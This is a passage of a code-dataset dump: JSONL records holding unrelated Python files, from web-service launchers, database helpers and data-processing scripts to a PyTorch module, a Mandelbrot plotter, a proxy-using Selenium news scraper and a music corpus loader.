'code':response.status,\n 'uri':request.full_path,\n 'request': request.args.to_dict(),\n 'response': json.loads(response.data.decode('utf-8'))\n })\n )\n\n else:\n app.logger.warning(\"REQUEST_LOG\\t%s\",json.dumps({\n 'status_code':response.status_code,\n 'method':request.method,\n 'code':response.status,\n 'uri':request.full_path,\n 'request': request.args.to_dict(),\n 'response': json.loads(response.data.decode('utf-8'))\n })\n )\n return response\n\nfrom blueprints.Book.resource import bp_book\n\napp.register_blueprint(bp_book, url_prefix = 
'/book')\n\ndb.create_all()\n","sub_path":"blueprints/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497422832","text":"\"\"\"\nLauncher for service-websockets.\n\nCopyright (c) 2017, Cassiny.io OÜ\nAll rights reserved.\n\"\"\"\n\nimport logging\nimport logging.config\nimport sys\n\nfrom aiohttp import web\n\nfrom config import Config as C\nfrom webhooks.routes import routes as webhooks_routes\n\nlogging.config.dictConfig(C.DEFAULT_LOGGING)\nlog = logging.getLogger(__name__)\n\n\ndef add_route(app, *args):\n \"\"\"Add routes to app instance.\"\"\"\n for route in args:\n app.router.add_route(route[0], route[1], route[2])\n\n\nif __name__ == '__main__':\n host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'\n port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080\n app = web.Application()\n add_route(\n app,\n *webhooks_routes\n )\n\n web.run_app(app, host=host, port=port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170824039","text":"from django.db import models\nfrom dateutil.parser import parse\nimport json\nclass Stock(models.Model):\n Date = models.DateField()\n Open = models.FloatField()\n High = models.FloatField()\n Low = models.FloatField()\n Close = models.FloatField()\n Shares_Traded = models.IntegerField()\n Turnover_Rs_Cr = models.FloatField()\n\nf = open(\"W:\\Dataworkz\\Dataworkztest\\Datafilter\\data.json\",\"r\")\njson_string = f.read()\nf.close()\n\ndata = json.loads(json_string)\n\nitems = []\nmonth={'Jan':'01',\"Feb\":'02',\"Mar\":'03',\"Apr\":'04',\"May\":'05',\"Jun\":'06',\"Jul\":'07',\"Aug\":'08',\"Sep\":'09',\"Oct\":'10',\"Nov\":'11',\"Dec\":'12'}\nfor stock in data:\n d = stock[\"Date\"][:2]\n m = stock[\"Date\"][3:6]\n y = stock[\"Date\"][7:]\n dt=y+\"-\"+month[m]+\"-\"+d\n s = Stock(Date = dt,\n Open = stock[\"Open\"],\n High = stock[\"High\"],\n Low = stock[\"Low\"],\n Close = stock[\"Close\"],\n Shares_Traded = stock[\"Shares Traded\"],\n Turnover_Rs_Cr = stock[\"Turnover (Rs. 
Cr)\"])\n s.save()","sub_path":"Dataworkztest/Datafilter/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"595396787","text":"import sys\nimport os\n\ntotal = 0\nacc = 0\nfor line in sys.stdin:\n line = line.strip()\n group = line.split()\n if (float(group[0]) - 0.5) * (float(group[1]) - 0.5) > 0:\n acc += 1\n total += 1\n\nprint(float(acc) / float(total))\n","sub_path":"python/examples/util/get_acc.py","file_name":"get_acc.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477017499","text":"#************************************************************************************************************************\n#Script Name :PS_Functions_IDS\n#Description :Extention on PS_Functions specific to IDS\n#Developer :Momberg Heinrich\n#CR Number(s) :ABITFA-605(IDS)\n#************************************************************************************************************************\nimport ael, acm\n\n#***********************************************************************************************\n# Public variables\n#***********************************************************************************************\ncalendar = acm.FCalendar['ZAR Johannesburg']\nINCEPTION = acm.Time().DateFromYMD(1970, 1, 1)\nTODAY = acm.Time().DateToday()\nFIRSTOFYEAR = acm.Time().FirstDayOfYear(TODAY)\nFIRSTOFMONTH = acm.Time().FirstDayOfMonth(TODAY)\nYESTERDAY = acm.Time().DateAddDelta(TODAY, 0, 0, -1)\nTWODAYSAGO = acm.Time().DateAddDelta(TODAY, 0, 0, -2)\nPREVBUSDAY = calendar.AdjustBankingDays(TODAY, -1)\nTWOBUSDAYSAGO = calendar.AdjustBankingDays(TODAY, -2)\n\nstartDateList = {'Inception':INCEPTION,\n 'First Of Year':FIRSTOFYEAR,\n 'First Of Month':FIRSTOFMONTH,\n 'PrevBusDay':PREVBUSDAY,\n 'TwoBusinessDaysAgo':TWOBUSDAYSAGO,\n 'TwoDaysAgo':TWODAYSAGO,\n 'Yesterday':YESTERDAY,\n 'Custom Date':TODAY,\n 'Now':TODAY} \nstartDateKeys = startDateList.keys()\nstartDateKeys.sort()\n\nendDateList = {'Now':TODAY,\n 'TwoDaysAgo':TWODAYSAGO,\n 'PrevBusDay':PREVBUSDAY,\n 'Yesterday':YESTERDAY,\n 'Custom Date':TODAY}\nendDateKeys = endDateList.keys()\nendDateKeys.sort()\n\n\n\n#***********************************************************************************************\n# Method name: _getCallAccounts\n# Description: Finds all the call accounts for the passed party\n# Parameters: party - The name of a counter party\n# Return Type: array\n#***********************************************************************************************\ndef getCallAccounts(portfolio, party):\n \n query = acm.CreateFASQLQuery('FTrade', 'AND')\n op = query.AddOpNode('AND')\n op.AddAttrNode('Counterparty.Oid', 'EQUAL', party.Oid())\n \n if(portfolio):\n op = query.AddOpNode('AND')\n op.AddAttrNode('Portfolio.Name', 'EQUAL', portfolio.Name())\n \n op = query.AddOpNode('AND')\n op.AddAttrNode('Instrument.InsType', 'EQUAL', acm.EnumFromString('InsType', 'Deposit'))\n \n op = query.AddOpNode('AND')\n op.AddAttrNode('Instrument.OpenEnd', 'EQUAL', acm.EnumFromString('OpenEndStatus', 'Open End') )\n \n for status in ['Void', 'Confirmed Void', 'Simulated', 'Terminated']:\n op.AddAttrNode('Status', 'NOT_EQUAL', acm.EnumFromString('TradeStatus', status))\n \n callAccounts = []\n for trade in query.Select():\n callAccounts.append(trade.Instrument())\n\n return callAccounts\n\n\n# Method name: _getReportTypes\n# Description: 
Returns the list of supported report output file types\n# Return Type: array\n#***********************************************************************************************\ndef getReportTypes():\n types = ['.pdf', '.csv']\n return types\n\n\n\n#***********************************************************************************************\n# Method name: _getXSLTemplates\n# Description: Finds all prime services extension modules of type xsl template \n# Return Type: array\n#***********************************************************************************************\ndef getXSLTemplates():\n xmlTemplates = []\n context = acm.GetDefaultContext()\n primeModule = context.GetModule('Prime Services')\n if not primeModule:\n raise Exception('Prime Service extension module not found')\n \n for d in primeModule.Definitions():\n if str(d.TypeClass()) == 'FXSLTemplate':\n xmlTemplates.append(d.Name())\n \n return xmlTemplates\n","sub_path":"Python modules/PS_Functions_IDS.py","file_name":"PS_Functions_IDS.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407942967","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sqlite3\n\ndb = './everything_sqlite3.db'\n\nconn = sqlite3.connect(db)\ncursor = conn.cursor()\n\ndef init_db():\n global conn\n global cursor\n with open('schema.sql') as f:\n cursor.executescript(f.read())\n conn.commit()\n\n# Next primary key (the primary key is maintained by the application itself)\ndef next_pk():\n cursor.execute('update pks set id = id + 1')\n conn.commit()\n cursor.execute('SELECT id FROM pks')\n return cursor.fetchall()[0][0]\n\n# Insert a new file record\ndef db_insert(id, name, isDir, createTime, lastChangeTime, parent, checkDate):\n isDir = isDir and 1 or 0\n cursor.execute('insert into files (id, name, isDir, createTime, lastChangeTime, parent, checkDate) \\\n values (?, ?, ?, ?, ?, ?, ?)', list(map(str, (id, name, isDir, createTime, lastChangeTime, parent, checkDate))))\n conn.commit()\n\n# Given an id, return the full file path\ndef fullFilePath(id):\n result = ''\n curid = id\n while True:\n cursor.execute('SELECT id, name, parent FROM files where id = ?', (str(curid),))\n value = cursor.fetchall()[0]\n result = value[1] + '/' + result\n if value[2] == 0:\n break\n curid = value[2]\n return result.rstrip('/')\n\n# Look up files; return the list of full paths whose names match\ndef db_getfile(fileName):\n l = []\n cursor.execute('SELECT id, name, parent FROM files where name like ?', ('%' + fileName + '%',))\n values = cursor.fetchall()\n for v in values:\n l.append(fullFilePath(v[0]))\n return l\n\ndef db_close():\n cursor.close()\n conn.close()\n","sub_path":"Python/toys/d01_everything/src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"198331015","text":"#!/usr/bin/env python\n# coding=utf-8\n\n# Problems with the Weibo CSV data:\n# In theory the label should sit in the second column; in this data both the\n# label and the text end up in the first column.\n# I do not know why '\\t' was used between the label and the text; a CSV file\n# should use ','.\n# So the only option is to read the first column from the end and take the\n# second-to-last character as the label.\n# @Silewhi\n\nfilename = './initial_data/1_weibo_rumor.csv'\nf_true = './processed_data/true/1_weibo_true.txt'\nf_false = './processed_data/false/1_weibo_false.txt'\n\nf1 = open(f_true,'w')\nf2 = open(f_false,'w')\n\nimport csv\n\nwith open(filename,'r',encoding = 'utf-8') as f:\n reader = csv.reader(f)\n for row in reader:\n flag = row[0][-1]\n print('flag =',flag,'\\n')\n row[0] = row[0][:-2]\n print(row)\n if flag == '0':\n f1.write(row[0])\n else:\n f2.write(row[0])\n
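\n# Editor's sketch (hypothetical alternative): the two output files could also be\n# opened with an ExitStack so they are closed even if a row raises mid-loop:\n# from contextlib import ExitStack\n# with ExitStack() as stack:\n# f1, f2 = (stack.enter_context(open(p, 'w')) for p in (f_true, f_false))\n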
\nf.close()\nf1.close()\nf2.close()\n","sub_path":"后端/frequent_words/1_weibo_earlier_deal.py","file_name":"1_weibo_earlier_deal.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343384223","text":"#!/usr/bin/env python3\n\nimport argparse\n\nfrom sqlite3.dbapi2 import Connection\n\nfrom data_access.sql_ops import AutoClosingConn\nfrom model.constants import sql as sql_queries\nfrom model.db_data import Entity, Classification\n\n\ndef parse_args():\n argparser = argparse.ArgumentParser(description='A tool for inserting taxonomy information on an entity to a db')\n argparser.add_argument(\n 'name', type=str, metavar='NAME', help='The entity\\'s common name (if any, otherwise its genus-species name)'\n )\n argparser.add_argument(\n '-p', '--pop', type=int, dest='pop_est', metavar='POPEST', help='The estimated population of this entity'\n )\n argparser.add_argument(\n '-c', '--conservation', type=str, dest='cons_cd', metavar='CONS_CD',\n help='This entity\\'s conservation status, as a 2-character code'\n )\n argparser.add_argument(\n '-t', '--taxonomy', type=str.upper, nargs='+', dest='taxonomy', metavar='TAXONOMY',\n help='The entity\\'s taxonomy, with each rank and that rank\\'s value joined by an equals (=) sign'\n )\n return argparser.parse_args()\n\n\ndef get_cons_status_codes(conn: Connection) -> dict:\n status_codes = {}\n cur = conn.cursor()\n for row in cur.execute(sql_queries['select']['all_cons_codes']):\n status_codes[row[1]] = row[0]\n return status_codes\n\n\ndef get_entity_id(conn: Connection, name: str) -> int:\n cur = conn.cursor()\n cur.execute(sql_queries['select']['entity_id_by_name'], (name,))\n row = cur.fetchone()\n return row[0] if row else None\n\n\ndef get_rank_id(conn: Connection, rank: str):\n cur = conn.cursor()\n cur.execute(sql_queries['select']['rank_id_by_label'], (rank.lower(),))\n return cur.fetchone()\n\n\ndef main(args):\n with AutoClosingConn() as conn:\n cons_codes = get_cons_status_codes(conn)\n entity_cur = conn.cursor()\n if args.pop_est is not None:\n pop_est = args.pop_est\n entity_type = 'entity'\n else:\n pop_est = None\n entity_type = 'weak_entity'\n entity_to_insert = Entity.build_namedtuple(name=args.name,\n cons_status_id=cons_codes[args.cons_cd],\n pop_est=pop_est)\n entity_cur.execute(sql_queries['insert'][entity_type], entity_to_insert)\n\n entity_id = entity_cur.lastrowid\n\n pairs_list = []\n for _p in args.taxonomy:\n label, classification = _p.split('=')\n rank_id = get_rank_id(conn, label.lower())\n # Store the classification value parsed from each RANK=VALUE pair.\n pairs_list.append(Classification.build_namedtuple(entity_id=entity_id, rank_id=rank_id[0], name=classification))\n entity_cur.executemany(sql_queries['insert']['classification'], pairs_list)\n\n\nif __name__ == '__main__':\n argv = parse_args()\n main(argv)\n","sub_path":"insert_entity.py","file_name":"insert_entity.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116157284","text":"import torch\nimport torch.nn as nn\n\nfrom .. 
import util\n\n\nclass EmbeddingFeedForward(nn.Module):\n def __init__(self, input_shape, output_shape, num_layers=3, hidden_dim=None,\n activation=nn.ReLU(),\n activation_last=nn.ReLU(),\n input_is_one_hot_index=False, input_one_hot_dim=None, scale=None, offset=None):\n super().__init__()\n self._input_shape = util.to_size(input_shape)\n self._output_shape = util.to_size(output_shape)\n self._input_dim = util.prod(self._input_shape)\n self._output_dim = util.prod(self._output_shape)\n self._scale = scale\n self._offset = offset\n self._input_is_one_hot_index = input_is_one_hot_index\n self._input_one_hot_dim = input_one_hot_dim\n if input_is_one_hot_index:\n if self._input_dim != 1:\n raise ValueError('If input_is_one_hot_index==True, input_dim should be 1 (the index of one-hot value in a vector of length input_one_hot_dim.)')\n self._input_dim = input_one_hot_dim\n if num_layers < 1:\n raise ValueError('Expecting num_layers >= 1')\n layers = []\n if num_layers == 1:\n layers.append(nn.Linear(self._input_dim, self._output_dim))\n else:\n if hidden_dim is None:\n hidden_dim = int((self._input_dim + self._output_dim)/2)\n layers.append(nn.Linear(self._input_dim, hidden_dim))\n for i in range(num_layers - 2):\n layers.append(nn.Linear(hidden_dim, hidden_dim))\n layers.append(nn.Linear(hidden_dim, self._output_dim))\n self._activation = activation\n self._activation_last = activation_last\n self._layers = nn.ModuleList(layers)\n\n def forward(self, x):\n # if self._offset is not None:\n # x -= self._offset\n # if self._scale is not None:\n # x /= self._scale\n\n # ensure batched\n if len(x.shape) == 0:\n x = x.view(1)\n if self._input_is_one_hot_index:\n x = torch.zeros(x.size(0), self._input_one_hot_dim).scatter_(1, torch.tensor([[int(i)] for i in x]), 1).to(device=x.device)\n else:\n x = x.view(-1, self._input_dim).float()\n for i in range(len(self._layers)):\n layer = self._layers[i]\n x = layer(x)\n if i == len(self._layers) - 1:\n if self._activation_last is not None:\n x = self._activation_last(x)\n else:\n x = self._activation(x)\n\n return x.view(torch.Size([-1]) + self._output_shape)\n","sub_path":"pyprob/nn/embedding_feedforward.py","file_name":"embedding_feedforward.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"472133238","text":"import DataPreProcessing\n\n#Creating the instance\nforward = DataPreProcessing.DatasetProcessing(-4, 3000,\n \"/Volumes/TRANSCEND/RPi-Self-Driving-Car/cardataset/Training/Right/\")\n\n#Calling the starter method\nforward.generateDataset()\n\n#Retreiving the image and labels array\ni_array = forward.getImgArray()\nl_array = forward.getLblArray\n\nprint(i_array[1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#Greyscale Conversion\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import misc\nfrom skimage.transform import resize\n\nimage = misc.imread(\"/Volumes/TRANSCEND/RPi-Self-Driving-Car/cardataset/Training/Forward/forward (1).png\")\nimage_resized = resize(image, (18,22), mode='reflect')\nimage_list = []\nimage_list.append(image_resized)\ngrey = np.zeros((1, 18, 22))\n\n#Weighted Average Conversion\ndef weightedAverage(pixel):\n return 0.299*pixel[0] + 0.587*pixel[1] + 0.114*pixel[2]\n\n#Converting each image from color to greyscale\nfor image_num in range(len(image_list)):\n for rownum in range(len(image_list[image_num])):\n for colnum in range(len(image_list[image_num][rownum])):\n grey[image_num][rownum][colnum] = 
weightedAverage(image_list[image_num][rownum][colnum])\nprint(\"Completed Greyscale Conversion\")\n\nplt.imshow(image_resized)\nplt.show()\nplt.imshow(grey[0], cmap='Greys')\nplt.show()\n'''\n### IMPORT AND RESIZE TESTING\n'''\nimport glob\nfrom scipy import misc\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\n\npath = \"/Volumes/TRANSCEND/RPi-Self-Driving-Car/cardataset/Training/Forward/\"\nimage_list = []\n\n#Import and Resize the images\nfor filename in glob.glob(path+'*.png'):\n image = misc.imread(filename)\n image_resized = resize(image, (18,22), mode='reflect')\n image_list.append(image_resized)\nprint(\"Done\")\n\nplt.imshow(image)\nplt.show()\nplt.imshow(image_list[0])\nplt.show()\n'''\n","sub_path":"Testing/DataPreProcessing/DataPreProcessing_Training.py","file_name":"DataPreProcessing_Training.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161202874","text":"import numpy as np \nimport cmath\nimport matplotlib.pyplot as plt\nclass Mandelbrot(object):\n def __init__(self,width,height,xlow,xhigh,ylow,yhigh):\n \"\"\"\n Constructor\n \"\"\"\n self.width = width # width of the grid\n self.height = height # height of the grid\n self.grid = np.zeros(shape = (width,height)) # initializing a grid of zeros\n self.xs = np.linspace(xlow,xhigh,width) # numpy array with high and low values initialized for a width for x axis. This forms the real axis\n self.ys = np.linspace(ylow,yhigh,height) # numpy array with high and low values initialized for a width for y axis. This forms the imaginary axis\n def check_mandel(self,c):\n \"\"\"\n Checking the mandelbrot algorithm\n \"\"\"\n z = 0 # inital value of z\n N = 0 # value of N to be plotted\n while (N < 255): \n z = z**2 + c # iterative algorithm for the mandelbrot set\n if (abs(z) > 2):\n return N # returning the value if it isnt a mandelbrot\n N += 1 \n return 0 #returning zero after threshold is crossed\n def plot_mandel(self):\n \"\"\"\n Plotting the values based on the iterative algorithm\n \"\"\"\n for i in range(self.height):\n for j in range(self.width):\n c = complex(self.xs[j],self.ys[i]) # creating a complex number\n N = self.check_mandel(c) # the value after which the threshold for mandelbrot is crossed\n self.grid[i,j] = N # grid coordinates\n plt.imshow(self.grid, extent=(self.xs[0],self.xs[len(self.xs) - 1],self.ys[0],self.ys[len(self.ys) - 1])) # imshow to plot the points\n plt.show() # displaying\n \n \n\n\n","sub_path":"Checkpoint_3/mandelbrot.py","file_name":"mandelbrot.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383564946","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\ndef browse(url, proxy = None):\n # url = 'https://httpbin.org/ip'\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n if proxy is not None:\n chrome_options.add_argument('--proxy-server=%s' % proxy)\n chrome_options.add_argument('--no-sandbox')\n driver = webdriver.Chrome('/home/ubuntu/chromedriver',chrome_options=chrome_options)\n driver.get(url)\n driver.implicitly_wait(3) # seconds\n page_source = driver.page_source\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.close()\n return page_source, soup\n \nclass CrawlMKListing():\n MONGO_URI = \"localhost:27017\"\n MONGO_DB = \"news\"\n 
MONGO_COLLECTION = \"malaysiakini_v1_test1\"\n DOMAIN = \"https://www.malaysiakini.com\"\n NEWS_LISTING_DOMAIN = \"https://www.malaysiakini.com/stories/covid19\"\n PROXY_LIST = [\"socks4://120.50.56.137:40553\",\"socks4://121.122.50.157:4145\", \n \"socks4://1.9.167.36:60489\",\"socks4://1.9.111.145:4145\",\n \"socks4://45.117.228.153:4145\",\"socks4://45.117.228.97:4145\",\n \"socks4://103.220.6.254:4145\"\n ]\n START_URL = NEWS_LISTING_DOMAIN\n \n def __init__(self):\n pass\n \n def crawl(self):\n CURRENT_PAGE_URL = self.START_URL\n self.init_mongo()\n proxy = random.sample(self.PROXY_LIST,1)[0]\n print(\"Using proxy:\", proxy)\n page_source, soup = browse(url = CURRENT_PAGE_URL, proxy = proxy)\n _check = self.check(soup)\n # if _check is not True, retry the whole crawl for this page\n if _check: \n to_insert, next_page = self.parse(soup)\n to_insert_2 = self.prevent_duplicate(to_insert)\n if len(to_insert_2) > 0:\n self.coll.insert_many(to_insert_2)\n else:\n print(\"False check.\")\n \n def init_mongo(self):\n client = pymongo.MongoClient(self.MONGO_URI)\n self.coll = client[self.MONGO_DB][self.MONGO_COLLECTION]\n\n def check(self, soup):\n try:\n x = soup.find(\"title\").get_text()\n except:\n return False\n if x is None:\n return False\n if x.find(\"Access denied\") >= 0:\n return False\n return True\n\n def parse(self, soup):\n DOMAIN = self.DOMAIN\n NEWS_LISTING_DOMAIN = self.NEWS_LISTING_DOMAIN\n \n x = soup.find(\"div\", \"news\").find_all(\"a\")[:-1]\n titles = [j.find(\"h3\").getText() for j in x]\n urls = [j.get(\"href\") for j in x]\n urls = [DOMAIN + url.replace(DOMAIN, \"\") for url in urls]\n df = pd.DataFrame(dict(title = titles, url = urls)) #.sample(30)\n if df.shape[0] == 0:\n raise Exception(\"shape 0\")\n to_insert = df.to_dict(orient=\"records\")\n next_page = NEWS_LISTING_DOMAIN + soup.find(\"div\", \"news\").find_all(\"a\")[-1].get(\"href\")\n return to_insert, next_page\n \n def prevent_duplicate(self, to_insert):\n url_list = [j.get(\"url\") for j in to_insert]\n exist_url_list = [j.get(\"url\") for j in list(self.coll.find({\"url\": {\"$in\": url_list}}, {\"url\":1}))]\n to_insert_2 = [j for j in to_insert if j.get(\"url\") not in exist_url_list]\n return to_insert_2\n \n\nC = CrawlMKListing()\nC.crawl()","sub_path":"Spider/archive/dep_selenium_mkini_scraper.py","file_name":"dep_selenium_mkini_scraper.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121642265","text":"import numpy as np\nfrom Galois_Field_mod_2.functions import strip_zeros\nimport Galois_Field_mod_2\n\ndef gf2_div(dividend, divisor,p):\n\n\n N = len(dividend) - 1\n D = len(divisor) - 1\n\n if dividend[N] == 0 or divisor[D] == 0:\n dividend, divisor = strip_zeros(dividend), strip_zeros(divisor)\n\n if not divisor.any(): # if every element is zero\n raise ZeroDivisionError(\"polynomial division\")\n elif D > N:\n f_temp = dividend\n num_temp = Galois_Field_mod_2.gf2_mul_normal(f_temp,p)\n result, rem = gf2_div(num_temp,divisor,p)\n return rem,result\n\n else:\n u = dividend.astype(\"uint8\")\n v = divisor.astype(\"uint8\")\n\n m = len(u) - 1\n n = len(v) - 1\n scale = v[n].astype(\"uint8\")\n q = np.zeros((max(m - n + 1, 1),), u.dtype)\n r = u.astype(u.dtype)\n\n for k in range(0, m - n + 1):\n d = scale and r[m - k].astype(\"uint8\")\n q[-1 - k] = d\n r[m - k - n:m - k + 1] = np.logical_xor(r[m - k - n:m - k + 1], np.logical_and(d, v))\n\n r = strip_zeros(r)\n \n return q, 
r\n","sub_path":"Galois_Field_mod_2/gf2_div.py","file_name":"gf2_div.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513855429","text":"import sys\n\nlines = []\nfor line in sys.stdin:\n\tlines.append(line.rstrip('\\n'))\n\ndic = {}\nfor i in lines[1:]:\n if (dic.get(i.split(\" \")[1], False)):\n dic[i.split(\" \")[1]] += 1\n else:\n dic[i.split(\" \")[1]] = 1\n\nfor key, value in dic.items():\n if (value == 1):\n for i in lines[1:]:\n if (i.split(\" \")[1] == key):\n res = i.split(\" \")[0]\nprint (res)\n","sub_path":"CodingBattle-GroupeBPCE/1-IntrusionAtFactory/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482345716","text":"import re\nfrom pprint import pprint\n\n\nregex = (\n r\"^Device ID: (?P\\S+)\"\n r\".*?\"\n r\"^ +IP address: (?P\\S+)\\n\"\n r\"^Platform: (?P.+?),\"\n r\".*?\"\n r\", Version (?P\\S+),\"\n)\n\nresult = {}\nwith open(\"sh_cdp_neighbors_sw1.txt\") as f:\n match = re.findall(regex, f.read(), re.DOTALL | re.MULTILINE)\n for m in match:\n device, ip, platform, ios = m\n result[device] = {\"ip\": ip, \"platform\": platform, \"ios\": ios}\n\npprint(result, width=60)\n","sub_path":"examples/15_module_re/parse_cdp_data_findall.py","file_name":"parse_cdp_data_findall.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383162849","text":"'''\nModule containing the Corpus class, which provides methods for loading an entire corpus of Pieces.\n'''\n\nfrom __future__ import annotations\n\nfrom glob import iglob\nimport random\nimport pickle\nimport music21 as mu\nfrom typing import Optional, Iterable, Tuple, Callable\n\nfrom .piece import Piece\nfrom .fmt import EventDataBuilder\nfrom .fmt.piece_data import PieceData\nfrom . import piece_filter\n\nclass AbstractCorpus(object):\n # Common code for save/loading of corpuses.\n def __init__(self):\n raise NotImplementedError\n\n def save(self, fname): \n with open(fname, 'wb+') as f:\n pickle.dump(self.__dict__,\n f,\n pickle.HIGHEST_PROTOCOL)\n\n def load(self, fname):\n with open(fname, 'rb') as f:\n self.__dict__ = pickle.load(f)\n\nclass Corpus(AbstractCorpus):\n '''\n A Corpus contains a collection of different mud.Piece objects.\n '''\n def __init__(\n self,\n patterns: Iterable[str] = [],\n filters: Iterable[Callable[[Piece], bool]] = [],\n from_file: Optional[str] = None,\n discard_rests: bool = False,\n max_len: Optional[int] = None,\n ignore_load_errors: bool = False,\n verbose: bool = False,\n transpose_to: Optional[str] = None):\n '''\n Load a corpus of pieces.\n \n Args:\n `patterns`: an iterable of globbable patterns (ie '*.musicxml'). Files which match the\n patterns will be loaded into the corpus. (Default: [])\n `filters`: an iterable of functions. Each function should take the form\n `f(mud.Piece) -> bool`. Only pieces which pass all filter functions will be kept.\n Useful filters are found in the `mud.piece_filter` module. (Default: [])\n `from_file`: This is a path to a pickled Corpus that will be loaded.\n If used, other information provided to load pieces will be *ignored*. (Optional)\n `discard_rests`: If True, the Rest notation events will be discarded in every piece.\n (Default: False)\n `max_len`: Stop loading when this many pieces have been successfully loaded. 
(Optional)\n `ignore_load_errors`: If True, ignore any load errors. Depending on the data being\n loaded, Music21 may not load pieces successfully, and this may be required.\n (Default: False)\n `verbose`: Show verbose output about the piece-loading process. (Default: False)\n `transpose_to`: If provided, transpose all pieces to this key. (Optional)\n\n Returns:\n A corpus containing the requested pieces.\n '''\n self._pieces = []\n self._num_rejected = 0\n\n if from_file is not None:\n if len(patterns) > 1:\n raise ValueError('Should not provide patterns if loading from file')\n self.load(from_file)\n else:\n def load(self_):\n for pattern in patterns:\n for fname in iglob(pattern):\n try:\n res, why = self_.load_piece(fname, filters, transpose_to)\n except (mu.exceptions21.StreamException,\n mu.musicxml.xmlToM21.MusicXMLImportException):\n if verbose: print(f' Failed to load file {fname}: ', end='')\n if ignore_load_errors:\n if verbose: print('continuing')\n continue\n if verbose: print('failing (use `ignore_load_errors=True` in corpus '\n 'to prevent)')\n raise\n if verbose:\n if res:\n print(f' loaded: {fname}')\n else:\n print(f' rejected: {fname}, {why}')\n if max_len is not None and self_.size() >= max_len:\n return\n load(self)\n \n if discard_rests:\n self.discard_rests()\n\n def size(self):\n ''' the size (number of pieces) in the Corpus '''\n return len(self._pieces)\n\n @property\n def pieces(self) -> Iterable[Piece]:\n ''' The contained list of pieces '''\n return self._pieces\n\n @property\n def num_rejected(self) -> int:\n ''' The number of pieces rejected when loading the corpus '''\n return self._num_rejected\n\n def passes_filters(\n self,\n piece: Piece,\n filters: Iterable[Callable[[Piece], bool]]) -> Tuple[bool, str]:\n '''\n Test whether a piece passes the required filter functions.\n\n Args:\n `piece`: the piece to test.\n `filters`: an iterable of lambda functions of the form `f(mud.Piece) -> bool`.\n \n Returns:\n A tuple `(passes, reason)`. `passes` is a boolean value indicating if the piece passed\n all the filters, and `reason` is a string which described why a piece did not pass if\n it failed.\n '''\n for f in filters:\n if not f(piece):\n self._num_rejected += 1\n return False, piece_filter.failure_reason(f)\n return True, \"Passes\"\n\n def load_piece(\n self,\n piece: str,\n filters: Iterable[Callable[[Piece], bool]] = [],\n transpose_to: Optional[bool] = None) -> Tuple[bool, str]:\n '''\n Load a single piece from a file into the Corpus if it passes the filters.\n Returns a tuple `(success, reason)`, where `reason` describes why a piece failed.\n '''\n p = Piece(piece, transpose_to)\n passes, reason = self.passes_filters(p, filters)\n if passes:\n p = self._pieces.append(p)\n return True, \"Success\"\n return False, reason\n\n def format_data(\n self,\n formatter: EventDataBuilder,\n slice_resolution: float,\n discard_rests: Optional[bool] = False) -> DataCorpus:\n '''\n Return a DataCorpus object containing the pieces in this Corpus formatted according to the\n given formatter object.\n '''\n return DataCorpus(self, formatter, slice_resolution, discard_rests)\n\n def filter(self, *filters: Callable[Piece, bool]):\n '''\n Filter out pieces that do not adhere to a set of filters. 
